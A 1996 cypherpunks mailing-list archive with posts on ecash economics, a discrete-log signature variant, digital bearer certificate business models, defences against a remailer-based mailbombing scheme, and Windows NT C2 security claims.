Content-Type: text/plain


On Thu, 11 Jan 1996, David Murray wrote:

> 1. Has there been any significant/in-depth coverage
> of the Mark Twain Banks product in the financial/
> banking press? Digicash's press file stops just
> before the launch, and Digicash/Mark Twain Banks
> press releases are not exactly what I'm looking for.

I wrote a paper on the economic aspects of ecash and other electronic
cashes last month.  I believe I posted it onto cypherpunks.  Main
conclusion was that ecash is equivalent to cash in terms of bank practice
and money supply.  I'll send you a copy if you want.  Not seen any mention
in the academic press though (either of my paper or of any others). 

PS the ecash mailing list is low volume and pretty focused.  discusses
securty and economics and stuff. 

-------------------------------------------------------------------------------
Patiwat Panurach      	     Whatever you can do, or dream you can, begin it.
eMAIL: pati@ipied.tu.ac.th      Boldness has genius, power and magic in it.
m/18 junior Fac of Economics		-Johann W.Von Goethe
-------------------------------------------------------------------------------







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kent Briggs <72124.3234@compuserve.com>
Date: Sat, 13 Jan 1996 08:43:48 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: p-NEW digital signatures
Message-ID: <960112182626_72124.3234_EHJ93-1@CompuServe.COM>
MIME-Version: 1.0
Content-Type: text/plain


I've been experimenting with discrete logarithm digital signatures.  Schneier
describes a scheme call p-NEW on page 498 of "AP" (2nd ed).
It has the advantage of not requiring an inverse calculation via the extended
Euclid algorithm.  The signature is shown as:

r=mg^(-k) mod p
s=k-r'x mod q

The verification equation is

m=(g^s)(y^r')r mod p

r'=r mod q.  If p is a strong prime then q=p-1 and r'=r.  The public key is
y=g^x mod p.  x is the private key.  k is a random number less than q.  m is the
message being signed.

I'm confused about the negative k value in the r equation.  This would lead to
1/g^k which is a fractional number.  It seems the equation should be:

r=mg^(q-k) mod p

Or, I can rearrange both equations like this:

r=mg^k mod p
s=-k-rx mod p

To avoid using negative numbers in the mod function, I can calc s as:

s=q-((k+rx) mod q)

I tried this with some small integers and the numbers work out.  The s
calculation will be quick since there is no exponentiation.  Most of the time
spent in signing a message will be the r calculation.  However, the the
verification equation [m=(g^s)(y^r)r mod p] has two exponentiation calculations
and will take more time.

Since a message is only signed once but could be verified many times, I could
precompute rg^s during the signing:

r=mg^k mod p
s=q-((k+rx) mod q)
z=rg^s mod p

s is discarded and the signature is r and z.  The verification is:

m=zy^r mod p

This slows down the signing but speeds up the verification.  Here's the $64K
question:  Does this compromise the signature's security?

Kent Briggs
kbriggs@execpc.com
CIS: 72124,3234
  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sat, 13 Jan 1996 07:40:47 +0800
To: cypherpunks@toad.com
Subject: (fwd) e$: Starting an Avalanche
Message-ID: <v02120d00ad1c588d46f6@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

Sender: e$@thumper.vmeng.com
Reply-To: e$@thumper.vmeng.com
Mime-Version: 1.0
From: rah@shipwright.com (Robert Hettinga)
Date: Fri, 12 Jan 1996 13:02:27 -0500
Precedence: Bulk
To: Multiple recipients of <e$@thumper.vmeng.com>
Subject: e$: Starting an Avalanche

-----BEGIN PGP SIGNED MESSAGE-----

e$: Starting an Avalanche

1/12/96
Boston, Massachusetts

The most interesting thing I've read in quite a while is a reprint of
the March 31,1995 issue of Esther Dyson's Release 1.0, which, I
understand, was the first time someone other than Esther herself edited
an issue.

The editor was none other than Eric Hughes, of cypherpunks fame, and the
topic was, of course, e$. Well, he didn't up and say "e$" anywhere,
exactly, the title of the whole issue was "A Long-Term Perspective on
Electronic Commerce", but he was talking about e$ just the same. Eric
told me about this magnum opus when he came to help me talk about e$ at
Apple in December. It was the first time I had heard of it, and when I
talk to people who are interested in these things, it's the first
they've heard of it, too. Blink once, and you miss the good stuff, I
guess..


I won't go too much into what he said there, as I'm still digesting it,
and it's frightfully copyrighted, but I'm sure you can get reprints from
EDventure Holdings, Esther's company, by sending e-mail to their
circulation and fulfillment manager, Robyn Sturm, robyn@edventure.com .

You can definitely tell Eric wrote it, though. When Eric's really
cooking, it's like he invents this whole language to describe what he's
talking about. In this case, that's a good thing, because most of what
he talks about he has to invent as he goes along. Anyway, it's 28
single-spaced elite-pitched pages of pure Eric, and it's manditory
reading for anyone who wants to sit in on an advanced e$ colloquium from
the comfort of their own living room...


I'm taking, as my text for today's sermon (say "amen!", somebody), the
following, from Eric's Release 1.0 issue, page 19:

"Multiparty compatibility.

"A software product launch is a two-party negotiation. Software vendors
write products for a given operating system and persuade consumers to
buy it. This is a standard retail transaction. Prospective sellers of a
money system, however, have a four-party negotiation: the money system
vendor, consumers, merchants and financial intermediaries.  That is,
there is one seller and three buyers, each of which has different system
requirements.

"Consumers have microcomputers or PDAs or smart cards. Merchants vary
widely by size; each will hve different requirements for operations
size. Banks and other intermediaries require extremely reliable
transaction processing systems. No single vendor will be able to meet
all these requirements. Anybody who expects to provide the entire
technology infrastructure for a new money system will fail outrightly
and completely. Success will require partnerships at the very least.
Open standards will be even more likely to succeed.

"This criterion against isolation cuts out several would-be contenders
from my book right away: Netbank, Digicash and the academic projects
NetBill and NetCheque.  This is not to say that these companies won't
have businesses, but rather that their ventures will always remain
small."

Now, this was written in, say, February of last year. A year ago. What
amazed me was that it was exactly what I was talking to someone about
last week. I love this stuff...

Now I'm not bashing any of the above payment schemes, here, but there is
a lot of the old industrohierarchical (see, Eric, I do neologism too!)
mindset in what a lot of e$ protocol developers are doing out there.

With that in mind, I'm going to step into *my* version of e$-Life,
- -the-Universe and -Everything, and I'm going to do it with a model for
distributing digital bearer certificates of various kinds, starting with
digital cash, but easily extensible to any kind of digital bearer
certificate.


Definitions

As Eric said, there are at least 4 players in any money system. I hope I
may be excused if I tweak this a bit...

Consumer

The first player is the consumer. This is the person who purchases a
digital bearer certificate for some reason. In the case of a digital
cash certificate, this person is buying a piece of digital cash from
someone else, for some other kind of money, in order to effect a
transaction on the net later.

Merchant

It gets more complicated a little later, but, for the time being, this
is a person who accepts a digital bearer certificate in exchange for
something else. Usually this person is a commercial entity, and thus
needs to be able to test the certificate, on-line with the underwriter,
before accepting it, in order to prevent double-spending and reduce the
risk of the transaction.

Underwriter

This is the entity which issues the certificates, and is responsible for
exchanging them into other forms of money or certificates of other
kinds. The second most important thing an underwriter does is to verify
that certificates haven't been double-spent.  The most important thing
an underwriter does is to market its certificates.

Trustee

A trustee holds the money for the underwriter while it's on the net.
Like bond trustees, the trustee works for "shareholders", the holders of
the digital certificates, according to an agreement between the
underwriter and the certificate holders. Typically, the trustee is a
bank, since certificates are usually settled for money.

Software Developer

Off of the net, there are consumers, underwriters and trustees of
physical certificates. We haven't really introduced any really
net-specific features. Here's where we do.  Since digital certificates
are digital objects, they're created and handled by software and moved
around on networks. The second most important thing that developers of
digital bearer certificate software do is to write software which
issues, verifies, and handles digital bearer certificates. The most
important thing that developers of digital bearer certificate software
do is to market their software to consumers, to trustees, and to
underwriters.

A software developer can develop all kinds of different software and
market that code to any market that's out there: vertical, functional,
or any niche that makes money. A developer can make wallets, which can
do peer-to-peer or client-server transactions, or cash registers, which
do on-line transactions involving the underwriter to validate
certificates against double spending, or mints, which produce and
validate the digital certificates themselves. A developer can even
subdivide those major software objects into smaller peices, if there's a
market for it.

Protocol Inventor

Protocol inventors are the people who had the idea to begin with. They
figured out how to generate, handle, verify, and transmit this
particular type of digital bearer certificate, and typically have
patents on the process. The second most important thing a protocol
inventor does is design cryptographic protocols, licence them, and
validate their implementation. The most important thing a protocol
inventor does is market their protocols to software developers, to
underwriters, and, in the early stages, to trustees.


A prima facie retread

Yes, it's time for Hettinga to trot out his now-threadbare (I'll say
"time-tested") business model for digital cash, and show how this all
works. Of course, you can use digital bearer certificates for all kinds
of things besides cash, and I contend in my more unrestrained moments,
that *any* security can be issued as a digital bearer certificate, but's
let's stick with digital cash here, for the time being.


The protocol inventor is a cryptographer who has a brainwave one day and
invents a digital bearer certificate protocol.  He announces it, patents
it if possible, lots of other cryptographers vet it, and it works.
Potential underwriters, software developers, and even trustees blow
apart his e-mail server asking him when he's going to let them build
code, businesses, or whatever it is they want him to let them build.

The inventor convenes a group of interested developers, and they start
working out how to implement the protocol into code. The inventor makes
deals with all of them. When they've finished their code, he'll certify
that their code adheres to the protocol, and they'll pay him a licence,
or a certification fee, or whatever.

The inventor also starts to chum the water for underwriters, even though
the developers are the people who're going to be actually closing deals
with them, and trustees, even though the underwriters are going to be
actually closing  deals with *them*.

So, the day comes, and people are actually buying these certificates.

The consumer buys, from one of many software developers, or is given, by
one of many underwriters, a wallet, which allows the storage and
disbursement of digital bearer certificates, either on-line or off-line.
I personally believe that there will be off-line transactions between
people who trust each other enough, caveat vendor ;-).

The consumer goes to a web page. Think of this web page as the
equivalent of an automatic teller machine. As such, it has at least
link-, and hopefully internet-level encryption to the user's machine.
Not only that, but the consumer's account information is probably
encrypted so that not even the underwriter sees it, in the same way that
the Cybercash protocol works now. If the consumer's machine has a card
swiper, then he swipes a card and enters a pin number. He could also
store this information encrypted on his hard drive, and just type a
passphrase to release it. He could also have all this on a smart card.
Software and hardware vendors will build what consumers, underwriters,
and trustees want to use.

The request and authorization for cash goes over the net, through the
underwriter and the ATM network to the consumer's bank, who sends an
authorization message back to the underwriter to disburse digital cash
certificates in the amount of the consumer's request. At least that's
the way it would work for the time being. It's easy to see that, if the
consumer's bank was on the net, the transmission authorizing
disbursement to the underwriter could just go over the net itself. The
bank and the underwriter settle with a fed funds wire. For the time
being, anyway. ;-). The underwriter then issues the certificates to the
consumer in the desired denominations, in addition to whatever fee the
underwriter charges, in the same way traveller's checks are sold at a
premium at the time of sale. The money from the consumer's bank goes to
the underwriter's account at his trustee bank, collecting interest,
payable to the underwriter, until the money comes back off of the net
someday, payable to the redeemer at par (the value of the  denomination
of the certificate).

The consumer then buys something on-line from a merchant, or off-line
from another consumer (or a merchant who can't afford the security of an
on-line transaction, and believes the risks are worth it), who then
either spends the cash certificate somewhere else or redeems the
certificate through the underwriter, who in turn has his trustee wire
the money to the merchant's bank.


Wearing too many hats

When you break the world up the way I have above, you see the world of
digital certificates in very interesting terms. First of all, you can
see what Eric was talking about. Lots of people in the digital cash
business are trying to wear too many hats. Underwriters who are also
trustees, protocol inventors developing software, merchants who are
software developers.

Remember my contention elsewhere that the worst thing you can do in a
geodesic market is to create industrial scale-economy hierarchies. The
more independent entities you have, doing different things in as
market-driven a fashion, the better. The instantaneity of communication
and the multiplicity of information processors continually lowers the
cost to entry and makes markets very competitive, forcing lots of
innovation and product evolution. Concentrations of information, or any
other resource, get "surfacted" into the lowest possible reaches of the
network as processor prices fall. In InfoWorld a couple of months ago, I
compared Microsoft to a dog in the manger in this regard, and you can
see what they're trying to do now that they figured out that their
monopolistic desktop strategy won't hunt on the internet.


Now What?

So. You've developed the be-all, end-all digital bearer certificate
protocol. What do you do? The most important thing you can do is to
develop, validate, and above all, promote your protocol.  Anything else
is not only inefficient, but, in the worst scenario, it can be
considered a threat to one or more of the other players in the system,
and no one will adopt it. Your protocol is stillborn.

The thing you want to do is to create as many software developers, as
many underwriters, and as many trustees as possible. Why?

The more underwriters you have, the more people are using your protocol.
Remember, the underwriters are charged with actually marketing the
certificates themselves. Also, the more underwriters there are, the more
robust your certificate system is, because there is no single point of
failure -- economic, operational, or otherwise -- in the system.

The more trustees you have, the more faith everyone has in the system.
The social and legal parts of your protocol are enforced by the
trustees. They're there to hold the stakes and keep everyone honest. To
prevent repudiation of the certificates by the underwriters themselves
by making them hold a respectable reserve against the certificates
outstanding, for instance. In addition, the trustees could be used to
settle certificates from one underwriter against those of others. That's
already built into the banking system, with various central bank wires
and clearing associations. In the model above, the trustee is the link
to the non-net economy. It is the ultimate settlement mechanism because,
for the time being, digital cash has to be denominated in other
currencies. Certainly, like any method of abstracting value, digital
cash cannot exist if it is not immediately convertable into other things
of value, so there will always be those who are responsible for
guaranteeing those conversions. In my model, and in non-net securities
markets, those people are the trustees.

The more developers you have, the more competition there is to build
software which creates, handles, and verifies the certificates as
efficiently and reliably as possible. Like underwriters, software
developers are responsible for marketing *their* products -- the
wallets, the cash registers, the mints, that your protocol requires in
order to function -- to the various participants in the digital
certificate market.

That means that you have to be as open with your protocol as possible.
You have to create a set of reference documents which everyone can read
and understand. You have to promote the hell out of the protocol by
hosting conferences of current and potential underwriters.  Then, when
you have lots of developers, underwriters, trustees, and, by extension,
users, of your certificate protocol, you have to keep the protocol
honest by cryptographically validating the various software parts so
that the market's participants can trust that the protocol is being
adhered to. That means *not* writing software, paradoxically. The reason
you have this great protocol is because you're a great cryptographer:
not a great underwriter/marketer, not a great developer, not a great
trustee/banker. The entire market can't function without you, and, in a
geodesic market, you can add significant value and get paid for that
value without owning all the other components of the system to get it.


The great unwashed avalanche

There's great benefit to having this great unwashed horde of people
helping you put all this together. Most of that benefit comes from
creating a large chaotic emergent system, a market. People can
specialize in some small piece of the system and optimize it without you
having to tell them what to do, for instance. In addition, very small
investments yield rewards way out of proportion to the money invested.

My favorite example for this is the prize that was offered for flying
non-stop from New York to Paris.  Many times the prize money was spent
in achieving the feat by all the contenders, and some single teams
probably spent more than the prize money all by themselves. The rewards
to the person who finally completed the trip greatly exceeded the prize
money he won. Finally, the rewards to aviation the aviation as a whole
were much greater than all the money spent by all the teams trying to be
first.

That's the great thing about creating an emergent process like a digital
certificate market. It's like kicking some snow down on top of an
avalanche zone. You release all that stored energy, ambition, and
talent.

All at once.


Cheers,
Bob Hettinga


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMPagTfgyLN8bw6ZVAQHmqQP/RaD/2XPxO2Gx2otHjAPI8+H+xkT85JSX
BqVyYEYo/8ilbf/bmZC9YDIhmi0vDpEODkj+7LJ0zsm8AX0LAOLj8N23f3R5LXX0
2QNvPczNN8v+9T1M2r4bhgtRUfy7OPFkOpvfbrJkkWT4XNL8PwojAA3UMVQ8UgYJ
A0nLC/z+78s=
=5TRr
-----END PGP SIGNATURE-----

--------------------------------------------------
The e$ lists are brought to you by:

Making Commerce Convenient (tm) - Oki Advanced Products - Marlboro, MA
Value-Checker(tm) smart card reader= http://www.oki.com/products/vc.html

Where people, networks and money come together: Consult Hyperion
http://www.hyperion.co.uk                    info@hyperion.co.uk

See your name here. Be a charter sponsor for e$pam, e$, and Ne$ws!
See http://thumper.vmeng.com/pub/rah/ or e-mail rah@shipwright.com
for details...
-------------------------------------------------

--- end forwarded text





-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 13 Jan 1996 06:03:11 +0800
To: cypherpunks@toad.com
Subject: Re: Novel use of Usenet and remailers to mailbomb from luzskru@cpcnet.com
Message-ID: <Pine.ULT.3.91.960112133738.10905e@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


This seems to have been confirmed in private email. So, what's the 
real target?

---------- Forwarded message ----------
Date: Fri, 12 Jan 1996 13:15:37 -0800 (PST)
From: Rich Graves <llurch@Networking.Stanford.EDU>
To: Eric Murray <ericm@lne.com>
Subject: Re: Novel use of Usenet and remailers to mailbomb from luzskru@cpcnet.com

On Fri, 12 Jan 1996, Eric Murray wrote:

> > Unless someone comes forward to say that they were the target of this 
> > attack, I'd guess that the target is the remailer network itself.
> 
> The target, Homer Wilson Smith, is one of the people embroiled in
> the Scientology wars.  I don't want to get into the recent history
> of repression and abuse by Scientology agents & sympathizers, but
> my guess is that this is an attempt to harass someone that
> Scientology doesn't like.

Yes, I've heard of him. But doesn't the given address just forward to a 
remailer? Have you seen anything to indicate that the flood really goes to 
him?

Actually, last time I saw, he was no longer really embroiled. He was 
backing off to become a neutral ISP. He still runs lazarus, of course.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zinc <zinc@zifi.genetics.utah.edu>
Date: Sat, 13 Jan 1996 06:04:23 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: PRZ grand jury - how about free accts for them...
Message-ID: <Pine.LNX.3.91.960112143342.4191C-100000@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

cpunks,

i was thinking about the whole PRZ thing last night and especially about 
our lack of information.  One of the best things that could happen is to 
get some or all of the members of the grand jury on the net and 
subscribed to the CP list so we could ask questions.

If they just had e-mail we could submit questions to them and ask that 
they reply to the whole list.

In this vein, it would be nice if someone (c2??) would offer dialup 
access for any members of the grand jury who wanted it.

i would be happy to offer shell accts to any member so they could 
enlighten us about the mysterious ways of the TLAs.  Unfortunately, they 
would need to obtain telnet access for this.

Is there any way we could offer these accts to them?  i suppose their
names are not known so this is obviously a problem and it wouldn't
speak well of the cypherpunks to go violating someones privacy just so
we could ask them to explain the government to us.

Just some thoughts...

- -pjf

patrick finerty = zinc@zifi.genetics.utah.edu = pfinerty@nyx.cs.du.edu
U of Utah biochem grad student in the Bass lab - zinc fingers + dsRNA!
** FINGER zinc-pgp@zifi.genetics.utah.edu for pgp public key - CRYPTO!
zifi runs LINUX 1.3.56 -=-=-=WEB=-=-=->  http://zifi.genetics.utah.edu 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by mkpgp1.6, a Pine/PGP interface.

iQCVAwUBMPbV2U3Qo/lG0AH5AQEqPAP9EGSd1P9+Fubx+9RsMrjYphRVRBiHN/Ne
DtlLgIx+g+i49lFfs0hAXfrpV5j/0l3fIDpUiUpUWEkJ+HJRfaAIdhgsYn1qNV+w
/CZHaUjGBejd0BxD0WhxH6hMEgpWaTimgyGRRxJkABqsDzuqhnwEt2HFmChucTSy
3ibOq8y1cTs=
=3TDU
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 13 Jan 1996 14:56:51 +0800
To: cypherpunks@toad.com
Subject: Re: Zimmermann case is dropped.
Message-ID: <199601121350.OAA20610@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Julian Assange wrote:
>
>The more important point being missed of course that Phil has and no
>doubt will continue to make certain elements of the U.S government
>quite miserable indeed.

   ...and I'm sure they'll be watching VERY closely to see how
version 3.0 will be distributed....







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Sat, 13 Jan 1996 04:28:13 +0800
To: cypherpunks@toad.com
Subject: Boston talk on offshore banks
Message-ID: <9601122001.AA18808@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


I heard an ad on the radio for a free seminar on how to protect your assets
using off-shore banks.  I forget who the speaker is, I think they're with
the English-Irish bank in Austria, or something like that.  The thrust
was to save assets for when you retire and Social Security isn't there
for you.

I'm posting this since off-shore banking touches on privacy issues
and comes up here now and then.

Two dates, Jan 17 (Newton, MA) or Jan 18 (Burlington, MA).
Call 617 663 3299 for more info.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zinc <zinc@zifi.genetics.utah.edu>
Date: Sat, 13 Jan 1996 07:39:44 +0800
To: Michael Froomkin <froomkin@law.miami.edu>
Subject: Re: PRZ grand jury - how about free accts for them...
In-Reply-To: <Pine.SUN.3.91.960112171657.9502I-100000@viper.law.miami.edu>
Message-ID: <Pine.LNX.3.91.960112154344.4191D-100000@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 12 Jan 1996, Michael Froomkin wrote:

> Date: Fri, 12 Jan 1996 17:17:35 -0500 (EST)
> From: Michael Froomkin <froomkin@law.miami.edu>
> To: zinc <zinc@zifi.genetics.utah.edu>
> Cc: cypherpunks <cypherpunks@toad.com>
> Subject: Re: PRZ grand jury - how about free accts for them...
> 
> sounds like jury tampering to me.  a good way to go to jail quickly.

how can it be jury tampering if the jury has been disbanded?  

i did not mean to influence an active grand jury, but to ask questions
of one that had finished it's job.

- -pjf


patrick finerty = zinc@zifi.genetics.utah.edu = pfinerty@nyx.cs.du.edu
U of Utah biochem grad student in the Bass lab - zinc fingers + dsRNA!
** FINGER zinc-pgp@zifi.genetics.utah.edu for pgp public key - CRYPTO!
zifi runs LINUX 1.3.56 -=-=-=WEB=-=-=->  http://zifi.genetics.utah.edu 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by mkpgp1.6, a Pine/PGP interface.

iQCVAwUBMPbke03Qo/lG0AH5AQFgPgQAoEs1YccZJVhSeUiFUTuvfe24+OJ1A07l
6eJBQpXPEX07V4udiAlSw9SQYoKO2ezwDVM0WW2Pr3lJnIfJ318neN5/OQe0YGxk
PqsrfvwaC7SlnrrSub9D8DKlCIoMVesowDeebkVMXeReaa75tcZn67/PYnctaCYq
cXhqg4TGoic=
=V7jy
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sat, 13 Jan 1996 08:41:29 +0800
To: abostick@netcom.com (Alan Bostick)
Subject: Re: Novel use of Usenet and remailers to mailbomb from luzskru@cpcnet.com
Message-ID: <2.2.32.19960113002203.00906fc0@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:25 PM 1/12/96 GMT, John Lull wrote:
>On Fri, 12 Jan 1996 10:55:12 -0800, you wrote:
>
>> Cypherpunks:  is there any way to respond to, or prevent, this sort of
>> attack short of actually shutting down the remailer?  
>
>Yes, very simply.
>
>The remailer could calculate a hash for the body of each encrypted
>message received (the same portion which will be decrypted by PGP),
>tabulate the last few thousand hashes, and simply discard any messages
>with a duplicate hash.  The target of the attack would receive only
>the first copy of the message.

I am afraid it is not that simple.  Remember that the mailbombing consists
of many, many horny little geeks responding to a single message.  They are
replying to the same message (and probibly adding a few "me too!" lines),
not mailing the same one over and over again.

Another idea would be to keep a md5 (or other) hash list of the reply block
used and have a disabled list for such spam attacks.  (Unfortunatly this
requires code, thus time.)

Pretty nasty variation on a "denial of service" attack.  What next?  Fake
"David Rhodes does e-cash" messages with the target's e-mail address? 

Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
              http://www.teleport.com/~alano/ 
       "Is the operating system half NT or half full?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <stend@grendel.texas.net>
Date: Sat, 13 Jan 1996 07:52:28 +0800
To: cypherpunks@toad.com
Subject: Re: PRZ grand jury - how about free accts for them...
In-Reply-To: <Pine.SUN.3.91.960112171657.9502I-100000@viper.law.miami.edu>
Message-ID: <55g2dlqamz.fsf@galil.austnsc.tandem.com>
MIME-Version: 1.0
Content-Type: text/plain


Michael Froomkin <froomkin@law.miami.edu> said:

MF> sounds like jury tampering to me.  a good way to go to jail quickly.

	Just like O.J.?  Or didn't you hear about the party he threw for
his jurors?

-- 
#include <disclaimer.h>				/* Sten Drescher */
1973 Steelers    About Three Bricks Shy of a Load    1994 Steelers
1974 Steelers         And the Load Filled Up         1995 Steelers?
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3
Unsolicited email advertisements will be proofread for a US$100 fee.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Sat, 13 Jan 1996 08:34:47 +0800
To: cypherpunks@toad.com
Subject: Novel use of Usenet and remailers to mailbomb from luzskru@cpcnet.com
In-Reply-To: <v02120d00ad1c6796463d@[199.0.65.105]>
Message-ID: <199601130017.RAA20992@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 An entity calling itself ABostick allegedly wrote:
>
> Somebody, too clever for their own good by half, has come up with a
> novel way of using Usenet and anonymous remailers to perpetrate
> mailbombs.  The M.O. is to post a message to the naked-lady newsgroups
> saying "get pics in your mailbox! send this message to this address!),
> giving the email address of a cypherpunk-style anonymous remailer and
> including a pgp-encrypted message block.

<snip>

> Cypherpunks:  is there any way to respond to, or prevent, this sort of
> attack short of actually shutting down the remailer?
> 
> What comes to my mind is the remailer operator grepping for a character
> string of ASCII-armored cyphertext from the known attack message and
> throwing messages containing it into the bit-bucket.  It is highly
> unlikely that this would appear in any message except the attack
> message.  The problem with this is that it works only for a known attack
> message -- it can shut down an ongoing attack, but it can't prevent new
> ones.


You could have remailers clamp down on multiple copies of the 
same message, but that is easily countered by convincing the
UseNet stupes to insert their e-mail address or something.


In general there is no way to prevent this kind of mail-bombing
without compromising anonymity.


By the way Alan--your message failed PGP verification.  
I received it by way of Bob Hettinga's "e$pam" list.  While
Hettinga gets double-plus good points for content, his
technical performance as a list operator is lacking.


Which is to say: the message might have gotten munged by the
"e$pam" list processor.


Regards,

Bryce

PGP sig follows



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMPb5w/WZSllhfG25AQGtPwQAgoxim084bbBkXIQyhePSY63HttrqFZg9
JGJjbKBMc6fHgI+gylEEAhl75wVUgq5jKPJcHVfY23XVS4wfPRu+CIx8uHhVm9xB
limA3BUscRutWsSXXe+tkKtyA97xUjpAMHpaE729pGeRForHEdpkRFb5jC3DjofX
lNpRuRQ9+VE=
=CyXg
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Sat, 13 Jan 1996 06:42:35 +0800
To: zinc <zinc@zifi.genetics.utah.edu>
Subject: Re: PRZ grand jury - how about free accts for them...
In-Reply-To: <Pine.LNX.3.91.960112143342.4191C-100000@zifi.genetics.utah.edu>
Message-ID: <Pine.SUN.3.91.960112171657.9502I-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


sounds like jury tampering to me.  a good way to go to jail quickly.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Sat, 13 Jan 1996 07:17:33 +0800
To: cypherpunks@toad.com
Subject: PGP filter?
Message-ID: <Pine.SOL.3.91.960112173346.15785A@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


InfoWorld, 1/8/96

Network Security:  
Software scans E-mail gateways for virus threats

-- by Jessica Davis

The increasing number of links between LANs and the internet has
raised security concerns on private networks.

To address this issue, Central House Technologies Inc. has
acquired the North American rights to MimeSweeper Internet mail
virus-protection sofware from Integralis Ltd., in Berkshire,
England. 

[...]

The Windows NT server application works by unbundling and
unzipping messages at the gateway and returning the attached
documents to their original file format.  Then MimeSweeper uses a
virus-checking utility installed by the customer to examine the
attachments.

Upon receipt of a suspect attachment, MimeSweeper notifies the
postmaster and quarantines the message until the administrator
can take action.

[...]

Integralis also plans to add the capability to scan outgoing
documents for confidential information and add corporate
disclaimers to outgoing mail.

Integralis is also working on support for public key encryption
to allow encrypted messages to enter private networks without
delays from quarantines.

[...]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 13 Jan 1996 10:13:40 +0800
To: cypherpunks@toad.com
Subject: Microsoft's papers on NT C2 thang
Message-ID: <Pine.ULT.3.91.960112175053.29691A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


[Oops, signature is only valid if the > 80 column line is preserved]
-----BEGIN PGP SIGNED MESSAGE-----

I'd appreciate it if someone could critique these papers for me, probably
off the list. 

[Note that 198.105.232.5 is just one of the IP addresses being 
load-balanced by www.microsoft.com. The servers seem to crash a lot with 
the current Gibraltar beta, so if one IP address doesn't work (like .5 
isn't responding to pings right now), try another and it will work.]

- -rich

- ---------- Forwarded message ----------
Date: 12 Jan 1996 11:22:38 -0600
From: Richard P. Bainter <pug@arlut.utexas.edu>
Newgroups: comp.security.misc, alt.security,
    comp.os.ms-windows.networking.misc,
    comp.os.ms-windows.networking.windows,
    comp.os.ms-windows.nt.admin.networking
Subject: Re: Microsoft continues to mislead public about Windows security bugs (a bit long, with references)

In article <t6d9w0JfFigb089yn@oslonett.no>,
Rune Moberg <mobergru@oslonett.no> wrote:
>>This is true. In fact NT was never C2-certified as any kind of network 
>>server at all, but only as a standalone workstation.
>I read a statement made by MS, that it doesn't matter, because if NT is
>proved to be C2 secure in a standalone configuration, then it's secure
>on the network as well. 

You believe everything MS tells you?! How naive.

>C2 security, AFAIK, also requires that the server is protected (controlled
>access). Once you have physical access to a machine, you could open it,
>put in a floppy or hard drive, and access anything you'd like to on the
>machine in question (with a disk editor, or with a fresh installation of
>the OS in question). Atleast that's the only way I can think of to break in
>on a NT Server.

Otay, let me see. The server is protected if you aren't hooked up to a
network. That implies *nothing* about the fact when a network is plugged
into it. If I'm sitting at the console and have to enter a password to
do things, doesn't mean I have to enter one from the network when I
mount the entire disk. (Even if that is not the true case.)

There are orange, red and blue books. This is all well pointed out on:

http://www.windows.microsoft.com/TechNet/boes/bo/winntas/technote/security.htm

What has Microsoft actually passed? I had heard it was only Orange book
C2 and not Red book C2.

Micrsoft also points it out on:

http://198.105.232.5/NTServer/c2bltn.htm

Ciao,

- -- 
